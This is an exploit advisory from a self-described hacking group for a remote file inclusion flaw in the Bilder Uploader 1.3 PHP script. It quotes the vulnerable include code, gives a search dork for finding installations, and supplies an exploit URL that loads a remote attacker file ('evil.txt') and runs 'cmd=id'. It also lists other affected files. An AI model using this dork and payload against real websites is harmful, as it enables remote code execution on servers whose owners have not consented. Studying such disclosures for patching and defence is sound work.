Bilder Uploader 1.3 Remote Command Execution Vulnerability ----------------------------------------------------------------------- Script : Bilder Uploader Version : 1.3 Site : http://www.mapos-scripts.de Founder : Rizgar Contact : rizgar@xxxxxxxxxxxxx and irc.gigachat.net #kurdhack Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys) d0rk : "Copyright (c) 2007 by Mapos-Scripts.de", ----------------------------------------------------------------------- Okey, look at nice codes :) <?php include($config["root_ordner"].'config.php'); include($config["root_ordner"].'includes/dbconnect.php'); include($config["root_ordner"].'includes/function.php'); $header = style('index_body','header'); $header = ereg_replace("{wobinich}", "Mitglieder Gruppen", $header); echo $header; $gruppen_id = intval($_GET["gruppe"]); if (!empty($gruppen_id)) { ?> http://www.site.com/path/gruppen.php?config[root_ordner]=http://evil.txt?&cmd=id And others... bild.php feed.php mitglieder.php online.php profil.php .. .. .. Eof.
